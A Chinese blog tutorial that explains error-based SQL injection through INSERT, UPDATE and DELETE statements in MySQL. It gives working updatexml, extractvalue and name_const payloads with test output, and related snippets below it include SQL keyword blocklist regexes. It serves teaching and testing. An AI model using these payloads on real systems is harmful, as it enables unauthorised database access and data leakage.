insert、update和delete 注入方法

最新推荐文章于 2024-05-17 17:16:04 发布
最新推荐文章于 2024-05-17 17:16:04 发布
阅读量4.9k 收藏 3
点赞数 1
分类专栏: web安全 文章标签: sql注入 insert注入 delete注入 update注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1124794084/article/details/84590929
版权

我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。

所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和delete的注入方法。

以下均为报错注入,测试数据库版本5.7.21

利用内置函数updatexml、extractvalue或name_const

测试表如下:

一、使用updatexml()函数


UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 
第三个参数:new_value,String格式,替换查找到的符合条件的数据 
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值
而我们的注入语句为:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

payload:

or updatexml(1,concat(0x7e,(version())),0) or

 

测试 insert注入:

mysql> insert into info(name,age) values('wangwu'or updatexml(1,concat(0x7e,(version())),0) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试update注入

mysql> update info set name='test'or updatexml(2,concat(0x7e,(version())),0) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试delete注入

mysql> delete from info where id=1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

二、extractvalue()函数

extractvalue() :对XML文档进行查询的函数
其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样
语法:extractvalue(目标xml文档,xml路径)
第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

payload:

or extractvalue(1,concat(0x7e,database())) or

测试insert注入

mysql> insert into info(name,age) values('wangwu'or extractvalue(1,concat(0x7e,version())) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试update注入:

mysql> update info set name='test' or extractvalue(1,concat(0x7e,version())) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试delete注入

mysql> delete from info where id=1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

三、name_const()函数

name_const(name,value)
返回给定值。 当用来产生一个结果集合列时, name_const()促使该列使用给定名称。

payload

or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or

测试insert注入

mysql> insert into info(name,age) values('wangwu' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'','22');
ERROR 1060 (42S21): Duplicate column name '5.7.21'

测试update注入

mysql> update info set name='test'or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'' where id =1;
ERROR 1060 (42S21): Duplicate column name '5.7.21'
mysql> update info set name='test' where id =1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

测试delete注入

mysql> delete from info where id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

参考链接:https://www.cnblogs.com/r00tgrok/p/3854754.html

实战测试:

HongCMS后台在清除表格的时候存在sql注入,即delete注入

详情连接:https://www.freebuf.com/vuls/178316.html

使用updatexml payload

使用extractvalue

使用name_const

黑面狐
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL数据的插入、修改、删除(INSERT /Update/DELETE
StringKing的博客
11-30 3052
一、数据的插入(Insert/Create) CREATE TABLE students ( id INT PRIMARY KEY NOT NULL AUTO_INCREMENT, sn INT NOT NULL UNIQUE COMMENT '学号', name VARCHAR(45) NOT NULL, email VARCHAR(200) NULL ); -- INSERT 操作的基本格式 -- 表名称: -- 全名称: `库名`.`表名` -- 库名和表名没有...
update语句_WEB安全之SQL注入(13)——update注入
weixin_39848953的博客
12-09 2567
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
【MySQL】2 insert updatedelete操作
scorpio_j的博客
01-06 217
1、Insert -- 公式 -- 一行 insert into js_user(字段1,字段2,字段3,...) VALUES(值1,值2,值3,...) -- 多行 insert into js_user(字段1,字段2,字段3,...) VALUES(值1,值2,值3,...),(值1,值2,值3,...)。。 -- 注意点 -- 自增 可以不用写 auto_increment -- 可同时插入多行数据 使用逗号隔开 insert into grade(`gradename`) VALUES('研
3、insert/update注入
最新发布
weixin_51520483的博客
05-17 610
1、猜测源码中的语句,形成闭合2、注意闭合,不一定是单号,也有可能双引号3、区分用and还是用or。
SQL注入Update注入
weixin_43765321的博客
03-03 5436
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
insert/update注入
Ethan024的博客
03-30 967
insert/update注入 实验环境: 皮卡丘靶场—insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
yii框架builder、updatedelete使用方法
10-26
本篇将详细介绍Yii框架中的`builder`、`update`和`delete`方法的使用。 1. Query Builder: Query Builder允许开发者通过面向对象的方式来构建SQL查询,无需直接编写原始的SQL语句。它通过一系列的方法调用来创建...
.Net防sql注入的几种方法
01-01
sql注入的常用方法: 1、服务端对前端传过来的参数值进行类型验证; 2、服务端执行sql,使用... private static string StrKeyWord = select|insert|delete|from|count(|drop table|update|truncate|asc(|mid(|char
JS代码防止SQL注入方法(超简单)
01-19
下面通过两个方面给大家介绍js代码防止sql注入的...re=/select|update|delete|truncate|join|union|exec|insert|drop|count|'||;|>|<|%/i; if(re.test(sQuery)) { alert(请勿输入非法字符); location.href
NoIOCFramework(005控制台动态实例UnitOfWork调用模式,完成InsertUpdateDelete数据操作验证).rar
12-18
框架、模式和依赖注入详解,使用常规开发思想和技术实现基于.NET Framework框架的第5个工程代码。
2019-12-12_NoIOCFramework(001控制台常规调用,完成InsertUpdateDelete数据操作验证).rar
12-12
框架、模式和依赖注入详解,使用常规开发思想和技术实现基于.NET Framework框架的第1个工程代码。
SQL核心语句(insert插入)(delete删除)(update更新)
05-06
适合SQL初学者!适合SQL初学者!适合SQL初学者!适合SQL初学者!
SQL注入——update注入(pikachu)
W小哥
01-15 3208
第一步:访问目标站点,注册一个账号xiaosan:123456,并登录 第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456 拦截数据包,右键发送到Repeater 第三步:测试注入点 正常请求页面 输入单引号测试注入点页面 第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,co...
SQL注入实战:Update注入
ting_liang的博客
01-21 729
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysql的Update语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
insert 注入逻辑
weixin_46601374的博客
04-01 206
现在的孩子,分手专挑情人节,告白专挑愚人 MYSQL注入什么是DML?INSERT语句基本使用INSERT语句报错逻辑INSERT留后门逻辑 情人节表白,人家不听。愚人节表白,人家不信。清明节表白,人家不应。 什么是DML? DML:数据操作语言 功能:主要是对表,视图等对象进行查询,插入,更新和删除操作 包括: select查询 insert插入 update更新 delete删除 INSERT语句基本使用 INSERT INTO users(uid,uname,password,isadmin)
update注入的一个小trick
vspiders的博客
06-18 338
0x01 Mysql特性Mysql中update语句的定义如下:UPDATE table_name SET field1 = new-value1, field2 = new-value2 [WHERE Clause]但是偶然发现,field1与field2两字段可以同名,并且UPDATE之后的字段内容会以field2的赋值为准。如上图中,Link字段被赋值了两次,最终的该Link字段的内容以最后...
mysql注入总结
关注安全的程序员
07-04 134
目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入insertupdate) 0x02 mysql报错注入 0x03 mysql一般盲注 0x04 mysql时间盲注 0x05 mysql其他注入技巧 0x06 mysql数据库版本特性 0x07 声明 正文: 0x00 mysql一...
Pikachu SQL注入insert/update注入
SS_liang的博客
01-11 1597
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
2015年rctf web150 (Update set 二次注入)
一个码农的笔记
11-17 4215
坦诚说,这次的题目脑洞有的大 http://180.76.178.54:8001/17752375bfee20369364468686989278/memberpage.php 此题略去登陆与注册还有前面上传的坑不说,光说说update set 的二次注入: 文件名有注入漏洞: 首先先了解几个函数的意义: mid(),hex(),conv() mid()
sql注入时回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
10-22
在这个引用中,回显信息是通过preg_match()函数来检测关键字,如果检测到了select、updatedelete、drop、insert、where或者.等关键字,就会被过滤掉,从而防止SQL注入攻击。但是,攻击者可以通过联合查询等方式来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值